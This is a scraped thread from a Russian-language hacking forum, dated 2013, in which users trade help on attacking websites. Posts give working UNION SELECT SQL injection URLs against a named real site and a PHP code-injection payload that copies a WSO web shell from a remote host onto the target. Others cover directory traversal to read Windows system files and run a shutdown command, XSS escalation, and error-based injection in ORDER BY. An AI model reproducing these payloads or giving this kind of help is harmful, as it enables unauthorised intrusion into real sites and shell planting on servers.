ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.11.2013, 16:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от psihoz26
psihoz26 said:
никак, заместо 13717 может быть любое число
не любое, например
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20UNION%20 SELECT%2013719,2,3,4,5,6,7,8,9,version(),11,12,13, 14,15,16,%2017,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33%20,34,35,36,37,38,39,40,41,42,43%20li mit%201,1--+1
такой вариант не проходит и почему пятизначное?
|
|
|
|
26.11.2013, 18:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от er9j6@
er9j6@ said:
не любое, например
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20UNION%20 SELECT%2013719,2,3,4,5,6,7,8,9,version(),11,12,13, 14,15,16,%2017,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33%20,34,35,36,37,38,39,40,41,42,43%20li mit%201,1--+1
такой вариант не проходит и почему пятизначное?
количесто знаков тут не причём))
збоку где вывод выводятся баннеры, каждая ссылка имеет свой id, наведи и увидишь, к примеру 9580
Сообщение от None
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=403%20UNION%20 SELECT%20
9580
,2,3,4,5,6,7,8,9,version%28%29,11,12,13,14,15,16,% 2017,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33%20,34,35,36,37,38,39,40,41,42,43%20limit%201,1--+1
вот если есть баннеры под определённым id - есть вывод, если нету то и вывода нету
|
|
|
|
26.11.2013, 18:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Разобрался, например и так выводится
http://www.bch5.ru/index.phtml?topparam=20&cat=40&scat=-403+union+select+1,2,3,4,5,6,7,8,9,version(),11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,9580,35,36,37,38,39,40,41,42,43--+
|
|
|
|
26.11.2013, 20:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
6871
Репутация:
-3
|
|
ниужели никто не знает мой вопрос? я думал тут профи сидят
|
|
|
|
27.11.2013, 12:09
|
|
Познающий
Регистрация: 20.03.2008
Сообщений: 47
Провел на форуме:
92778
Репутация:
1
|
|
есть такая ссылка типа http://xxx.com/index.php?a=xxx&b=xxx
в переменные A и B можно запихнуть javascript код и он выполняется. как дальше можно раскрутить эту уязвимость(кроме пассивной xss)
|
|
|
27.11.2013, 21:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
PHP inj
site.com/recipe/rss/${@copy('http://site.ru/wso2_pack.txt', 'wso2_pack.php')}
Выдает: Account unavailable
1. В чем ошибка?
2. Где будет расположен шелл?
3. Где можно почитать информацию?
П.с.:
- http://site.ru/wso2_pack.txt - залит шел переименовал в txt;
- wso2_pack.php - путь до самого шелла.
Благодарю.
|
|
|
|
27.11.2013, 22:10
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Always
Always said:
PHP inj
site.com/recipe/rss/${@copy('http://site.ru/wso2_pack.txt', 'wso2_pack.php')}
Выдает: Account unavailable
1. В чем ошибка?
2. Где будет расположен шелл?
3. Где можно почитать информацию?
П.с.:
- http://site.ru/wso2_pack.txt - залит шел переименовал в txt;
- wso2_pack.php - путь до самого шелла.
Благодарю.
Я не разбираюсь, но мне кажется надо указать полный путь.
|
|
|
|
28.11.2013, 18:17
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме:
401944
Репутация:
37
|
|
Сообщение от kingbeef
kingbeef said:
Я не разбираюсь, но мне кажется надо указать полный путь.
Не обязательно. Если хочешь шелл в текущую папку залить, где скрипт выполняется, то надо в его случае:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'http://site.ru/wso2_pack.txt'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'./wso2_pack.php'[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
|
|
|
|
28.11.2013, 19:49
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 90
Провел на форуме:
390073
Репутация:
44
|
|
Сообщение от ex'pert
ex'pert said:
Доброго времени суток,
есть сайт с возможностью просмотреть файлы из виндоувс папки, (Directory traversal vuln) например:
Код:
Code:
?action=../../../../../../../../../../windows/System.ini%00.jpg
Вопрос можно ли выполнить запрос к командной строке? например послать команду выключения.. пробывал так:
Код:
Code:
action=../../../../../../../../../../windows/system32/cmd.exe-shutdown%20-t%200%00.jpg
непомогло. помогите разобратся( Если нет запуска процесса, то не выйдет.
|
|
|
|
28.11.2013, 21:39
|
|
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171
Репутация:
3
|
|
Есть иньекция вида:
Код:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id {SQL-INJ}
Пробую делать так:
Код:
Code:
SELECT * FROM `data` WHERE name = 'test' ORDER BY id+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1+--+1
Но получаю:
#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+concat((select+version()),floor(rand(0)* 2))+having+min(0)+or+1+--+1' at line 1
А если делать union select
Код:
Code:
SELECT * FROM `date` WHERE name = 'test' ORDER BY id union select 1
то получаю:
#1221 - Incorrect usage of UNION and ORDER BY
Как сделать правильно? Или после конструкции ORDER нельзя уже ничего сделать? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [R]eD](/avatars/avatar26157.jpg?3627797){kind=avatar}
Похожие темы
Линейный вид
